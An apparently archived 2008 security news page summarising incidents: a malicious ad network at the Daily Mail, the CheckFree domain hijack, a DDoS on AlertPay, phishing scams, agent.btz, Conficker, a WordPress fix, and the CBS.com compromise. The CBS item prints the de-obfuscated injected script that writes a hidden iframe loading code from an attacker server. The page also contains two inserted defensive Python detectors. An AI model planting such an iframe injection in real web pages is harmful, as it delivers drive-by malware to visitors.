CyberInsecure.com

Daily cyber threats and internet security news alerts
December 3rd, 2008

Advertising Network Serves Malicious Ads, Daily Mail Website Readers Redirected To Malware Installing Server

According to SophosLabs, an advertising network used by the Daily Mail website is being used to serve up malware. A strain of the Mario family of worms was being offered by an Israeli advertising network used by the Daily Mail.

The tainted ads are the work of malicious hackers who somehow succeeded in injecting redirection scripts into the ad network. Code injected into an advertising stream is being used to serve up content for a malware-harbouring website located in Russia. This site uses vulnerabilities in browser software to download malicious code onto unpatched Windows PCs, a classic drive-by-download attack.

Analysis of the attack is ongoing, and it is not yet clear which other sites that also use Eyeblaster, the affected ad-serving network, might be affected.

Sophos's investigation revealed the suspicious behaviour as follows: Internet Explorer was started on its default homepage and then pointed at the affected web page. After half a dozen refreshes it attempted to connect to http://77.221.133.xxx, an IP address known for hosting malware in the past. Further investigation showed that the site anm.co.uk was hosting the malicious code alongside legitimate adverts.

A WHOIS lookup on this IP address shows it is hosted in Russia. Sophos has recently seen IPs in this network range associated with W32/MarioF-Gen.

The Daily Mail has been informed of the attack, but it is unclear how far Associated Newspapers technicians have gone in blocking it.


  • December 3rd, 2008

    CheckFree Online Payment Site Hijacked By Criminals, Users Redirected To Rogue Server

    Online payment service CheckFree lost control of at least two of its domains on Tuesday in an attack that sent customers to servers run by cybercriminals from Eastern Europe.

    The Register reports on a reader who received a bogus secure sockets layer certificate when he attempted to log in to his Mycheckfree.com account early Tuesday morning. On further examination, he discovered the site was mapping to 91.203.92.63. To confirm the redirection was an internet-wide problem, he checked the site using a server in another part of the US and got the same result. Customer support technicians were not aware of any problem.

    Security experts say the 91.203.92.63 IP address has long served as a conduit for online crime. According to security researcher Paul Ferguson of anti-virus software provider Trend Micro, the IP address was recently observed handing off booby-trapped PDF files that infected those unfortunate enough to open them.

    According to bfk.de, Spamhaus, and SpyNoMore, several other web addresses are also being redirected to that IP address, including phgainc.org, brachetti.com, and camouflageclothingonline.net.

    It’s unclear how long checkfree.com and mycheckfree.com were redirected to the rogue servers or whether customers have been warned they may have been compromised.

    It’s also unclear how the culprits managed to hijack the domains. While security experts say DNS poisoning wasn’t out of the question, the more likely explanation is a malicious transfer of the domains through their registrar. Indeed, whois records for both addresses indicate they were updated sometime Tuesday.

    Credit: The Register


  • December 1st, 2008

    AlertPay.com Hit By A Massive DDoS Attack, Outage Took A Day To Resolve

    Millions of account holders at privately owned online payment gateway, AlertPay.com, weren’t able to do business through the service yesterday. According to a notice left by a company representative, AlertPay was under a large scale DDoS attack.

    Seven hours of downtime right in the middle of the Christmas shopping season, affecting millions of businesses that use the service, isn’t coincidental. This DDoS attack, just like the recent DDoS attack against a popular anti-fraud site, may well have been outsourced.

    AlertPay’s statement on the situation posted yesterday states:

    We are currently experiencing a large scale DDOS attack that has hit our sites which started at approximately 6:00am EST Sunday. We are working with our data center to resolve and/or mitigate this issue. More information will be posted here as we get updates. For the time being customers can connect to AlertPay at an alternate location: https://67.205.87.226

    Several hours later, AlertPay issued an update:

    We have finally mitigated the massive DDOS attack that started at 6:00am EST. Unfortunately it took almost all day to resolve. The site is operational now, and hopefully we’ll continue to tweak it more tomorrow to ensure this doesn’t happen again. We sincerely apologize for the inconvenience and we understand that this outage affects each of you personally. We’re sorry for that. We will continue to put measures in place so that outages like this do not occur again.

    It is unclear who exactly is behind this DDoS attack. It might be an unethical competitor, which in times of international economic meltdown can easily restore its market position by damaging the reputation and reliability of a known rival. It could also be cybercriminals who have a reason to damage a particular online payment processor that has, for example, detected their fraudulent activity and thereby caused them huge monetary losses.

    Online payment gateways have always been targets for DDoS extortionists, but with attackers now offering DDoS services for hire, anyone who knows how to contact them can outsource an attack and shift responsibility for it to a third party.

    AlertPay is not the first payment gateway to be hit by a DDoS during the last couple of years. In 2004 four large online payment processors were hit: Worldpay, Authorize, Authorize-It and 2Checkout. StormPay followed in 2006 and LibertyReserve in 2008.


  • December 1st, 2008

    Scammers’ Spam Lures Users Into Fake McDonald’s Survey With A Non-existent Money Reward

    Phishing fraudsters are attempting to scam gullible users into handing over their credit card details on the basis of a supposed offer from McDonald’s.

    The scam relies on spam emails to trick users into answering a fictitious satisfaction survey that offers a non-existent reward of $75. After completing the quiz, prospective marks are asked to hand over their banking details in order to receive their reward: name, email address and credit card details. Crooks will doubtless go on either to use this information to fraudulently buy goods or, more likely, to sell it to others in the digital underground.

    This isn’t the first time a bogus survey has been used in a phishing attack. Surveys related to Wal-Mart, American Airlines, and even U.S. President-Elect Barack Obama were previously used to collect personal information from potential victims.

    Also, just like this phishing attack on McDonald’s, all of those surveys promised some form of reward to anyone who participated. This clearly shows that cyber criminals are taking advantage of users’ tendency to try and save as much money as they can, especially this holiday season.


  • December 1st, 2008

    Military US Base Systems In Afghanistan And Iraq Hit By A Virus, At Least One Classified Network Penetrated

    The ‘malware’ strike, thought to be from inside Russia, hit combat zone computers and the U.S. Central Command overseeing Iraq and Afghanistan. According to a report from Washington, the incursion posed unusual concern among commanders and raised potential implications for national security.

    Defense officials would not describe the extent of damage inflicted on military networks. But they said that the attack struck hard at networks within U.S. Central Command, the headquarters that oversees U.S. involvement in Iraq and Afghanistan, and affected computers in combat zones. The attack also penetrated at least one highly protected classified network.

    Military computers are regularly beset by outside hackers, computer viruses and worms. But defense officials said the most recent attack involved an intrusive piece of malicious software, or “malware,” apparently designed specifically to target military networks. The invasive software, known as agent.btz, has circulated among nongovernmental U.S. computers for months. But only recently has it affected the Pentagon’s networks. It is not clear whether the version responsible for the cyber-intrusion of classified networks is the same as the one affecting other computer systems.

    The malware is able to spread to any flash drive plugged into an infected computer. The risk of spreading the malware to other networks prompted the military to ban the drives.

    Although officials are withholding many details, the attack underscores the increasing danger and potential significance of computer warfare, which defense experts say could one day be used by combatants to undermine even a militarily superior adversary.

    Military electronics experts have not pinpointed the source or motive of the attack and could not say whether the destructive program was created by an individual hacker or whether the Russian government may have had some involvement. Defense experts may never be able to answer such questions, officials said.

    Suspicions of Russian involvement come at an especially delicate time because of sagging relations between Washington and Moscow and growing tension over U.S. plans to develop a missile defense system in Eastern Europe. The two governments also have traded charges of regional meddling after U.S. support for democratic elections in former Soviet states and recent Russian overtures in Latin America.

    The offending program has been cleansed from a number of military networks. But officials said they did not believe they had removed every bit of infection from all Defense Department computers.


  • November 28th, 2008

    Paypal Is Being Used In Popular Nigerian 419 Scam

    A new variant of the popular Nigerian 419 scam is being run via PayPal, according to a report by the Inquirer. The 419 scam is named after the relevant section of the Nigerian Criminal Code, and the premise is always the same: somebody offers to pay money into your account and give you a cut when you send it back. In truth the whole thing is money laundering, but this latest twist – using PayPal – is significant because, on the surface, it looks like there’s no catch.

    Instead of receiving the offer via email (as is normally the case), the target in this report was approached over a Skype chat session. The perpetrator wants to transfer funds out of a PayPal account and convert them back into US dollars. All the victim needed to do was check his PayPal account and, when the money arrived, send a significantly lower amount back via Western Union.

    PayPal’s payment reversal policy provides the loophole that makes the scam work. As the payment would be classified as ’services’ rather than goods, there would be no proof that the victim – who becomes the ‘vendor’ – provided any goods. So the ‘buyer’ – in this case the scammer – gets the money back. In the meantime, the vendor has sent the dollars via Western Union and then finds himself stuck with no means of recourse.

    Both Western Union and PayPal can be blamed for making this scam work. Western Union makes it too easy to send and receive money anonymously, while PayPal’s dispute resolution procedure is a crude automated system.


  • November 27th, 2008

    Infecting Christmas E-greetings Are Distributed Via Spam

    Websense Security Labs has discovered that malware authors are already using Christmas themes this year as a social engineering tactic, in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings, leading to supposed animated postcards. These actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns.

    The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com domain space.

    Once executed, the malware creates a backdoor that gives its author access to and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique.

    Example of malicious email (screenshot not reproduced here).


  • November 27th, 2008

    CBS.com Subdomain Compromised, Installing Malware On Visitors PC’s

    Once again a legitimate website has been infected with malicious obfuscated code; this time it was CBS.com. It seems popular sites with very high traffic remain a favourite and highly effective attack vector for hackers.

    Today Finjan has revealed that the subdomain of a famous radio and television network, etix.cbs.com, was compromised as a result of malicious activity. The cybercriminals added a malicious obfuscated script to the infected page. The injected script added a malicious IFrame to the page.

    The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, potentially installing malware on the unsuspecting client machine. De-obfuscated script code from the cbs.com sub-domain:

    <SCRIPT>
    window.status='Done';
    document.write('<iframe name=29dee5c6 src=\'http://[REMOVED]/.if/go.html?' + Math.round(Math.random()*257224) + '3e78\' width=632 height=407 style=\'display: none\'></iframe>')
    </SCRIPT>

    The malicious Russian server from which the IFrame pulled its code is located in Saint Petersburg and hosted by “ZAO National Telecomunications ISP”.
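The injection pattern above is easy to spot mechanically once the script is de-obfuscated. The following Python scanner is an added example, not Finjan's or CBS's code: it parses a page, flags iframes that are hidden or point at a third-party host, and flags inline scripts that document.write() a hidden iframe with a randomised cache-busting query string. The host names and the sample page are constructed, with the real host replaced by the article's [REMOVED] placeholder.

```python
import re
from html.parser import HTMLParser

# Patterns matching the injection style of the de-obfuscated script above.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
WRITE_IFRAME = re.compile(r"document\.write\s*\(\s*['\"]\s*<iframe", re.I)
RANDOM_QUERY = re.compile(r"Math\.random\s*\(", re.I)


class IframeAuditor(HTMLParser):
    """Collects hidden or third-party <iframe>s and inline scripts that build them."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._in_script = False
        self._script = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            return
        if tag != "iframe":
            return
        src = (a.get("src") or "").lower()
        host = re.sub(r"^https?://", "", src).split("/")[0]
        reasons = []
        if HIDDEN_STYLE.search(a.get("style") or ""):
            reasons.append("hidden iframe")
        if host and host != self.page_host:
            reasons.append("third-party src " + host)
        if reasons:
            self.findings.append(("iframe", ", ".join(reasons)))

    def handle_data(self, data):
        if self._in_script:  # script bodies arrive here as raw text
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag != "script":
            return
        body = "".join(self._script)
        self._script, self._in_script = [], False
        reasons = []
        if WRITE_IFRAME.search(body):
            reasons.append("script writes an iframe")
            if HIDDEN_STYLE.search(body):
                reasons.append("with hidden style")
            if RANDOM_QUERY.search(body):
                reasons.append("with randomised query string")
        if reasons:
            self.findings.append(("script", ", ".join(reasons)))


def audit_page(html, page_host):
    """Return [(kind, reason)] for everything suspicious found in the HTML."""
    p = IframeAuditor(page_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample: one benign same-origin iframe plus the injection pattern
# from the article (hypothetical host etix.example.test, [REMOVED] placeholder kept).
SAMPLE = """<html><body><h1>Tickets</h1>
<iframe src="http://etix.example.test/widget" width=300 height=200></iframe>
<SCRIPT> window.status='Done'; document.write('<iframe name=29dee5c6 src=\\'http://[REMOVED]/.if/go.html?' +Math.round(Math.random()*257224)+'3e78\\' width=632 height=407 style=\\'display: none\\'></iframe>') </SCRIPT>
</body></html>"""

if __name__ == "__main__":
    for kind, why in audit_page(SAMPLE, "etix.example.test"):
        print(kind, "->", why)
```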

    Finjan immediately informed CBS.com of the infection and currently the remote Russian server is down.


  • November 27th, 2008

    Another Worm Exploiting MS08-067 Windows Flaw Spotted In The Wild

    Microsoft’s Security Response Center and McAfee are warning of increased network scanning activity over the last couple of days, courtesy of the latest W32/Conficker.worm, which exploits the already patched MS08-067 vulnerability. After last month’s ruckus over Microsoft’s out-of-band patch, another threat leveraging MS08-067 was recently reported to be causing more trouble in the wild.

    What’s particularly interesting about the latest wave of copycat worms is that W32/Conficker.worm patches the infected host to ensure that competing malicious parties cannot get in the same way.

    This malware mostly spreads within corporations but has also been reported by several hundred home users. It opens a random port between 1024 and 10000 and acts like a web server. It propagates to random computers on the network by exploiting MS08-067. Once a remote computer is exploited, that computer downloads a copy of the worm via HTTP using the random port opened by the worm. The worm often uses a .JPG extension when copied over, and is then saved to the local system folder as a randomly named DLL.

    McAfee Avert Labs has also seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in its Virus Information Library, W32/Conficker.worm decides how it will load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000. Once loaded in the service space, the worm attempts to download files from the Internet, specifically further malware from trafficconverter.biz and data files from maxmind.com.

    The public release of the proof-of-concept code in September prompted an immediate reaction from international underground communities, which released several different modifications of the exploit; Chinese groups were the first to release a do-it-yourself tool allowing subnet scanning and automatic exposure to malware hosted on a third-party server.
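A defender can catch the .JPG-named transfer described above by checking file content against the file extension rather than trusting the name. The following Python check is an added example, not McAfee's analysis code or anything from the worm; the PE and JPEG samples it scans are constructed byte strings with only the header fields needed for the check, not real malware.

```python
import struct


def looks_like_pe(data):
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def looks_like_jpeg(data):
    """JPEG files start with the SOI marker followed by a 0xFF marker byte."""
    return data[:3] == b"\xff\xd8\xff"


def classify(data):
    if looks_like_pe(data):
        return "pe"
    if looks_like_jpeg(data):
        return "jpeg"
    return "unknown"


def extension_mismatch(filename, data):
    """Return a message when a .jpg/.jpeg name carries non-JPEG content, else None."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    kind = classify(data)
    if ext in ("jpg", "jpeg") and kind != "jpeg":
        return f"{filename}: extension says JPEG but content is {kind}"
    return None


def fake_pe(size=0x100):
    """Constructed, non-executable bytes: a DOS 'MZ' stub whose e_lfanew (offset
    0x3C) points at a 'PE\\0\\0' signature at offset 0x80. Hypothetical sample."""
    buf = bytearray(size)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


# Constructed inputs: a real-looking JFIF header, a PE hiding behind a .jpg
# name (the worm's transfer trick), and an unrelated text file.
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64,
    "a1b2c3.jpg": fake_pe(),
    "notes.txt": b"plain text",
}


def scan(samples):
    """Return the mismatch messages for every (name, bytes) pair in samples."""
    hits = []
    for name, data in samples.items():
        msg = extension_mismatch(name, data)
        if msg:
            hits.append(msg)
    return hits


if __name__ == "__main__":
    for line in scan(SAMPLES):
        print(line)
```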


  • November 27th, 2008

    XSS Flaw Fixed In Latest WordPress 2.6.5

    WordPress has fixed a cross-site scripting (XSS) flaw in its blogging software. The flaw only affects IP-based virtual servers running on Apache 2.x. Version 2.6.5 also addresses three unrelated performance and stability bugs with the open source package.

    The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests. For a list of changed files, consult the full changeset between 2.6.3 and 2.6.5.

    On the affected IP-based virtual server setups, it might be possible for attackers to rig systems so that they serve up malicious JavaScript from domains under their control.

    WordPress has jumped from version 2.6.3 to 2.6.5 of the software in order to avoid confusion with 2.6.4, a fake version recently offered up by black hats via a bogus site WordpresZ. Webmasters were directed to download the backdoor-rigged code earlier this month by hackers exploiting vulnerabilities in the blogging package. There is not and never will be an official 2.6.4 version.

    If you are a WordPress blog owner and are interested only in the security fix, copy wp-includes/feed.php and wp-includes/version.php from the 2.6.5 release package.
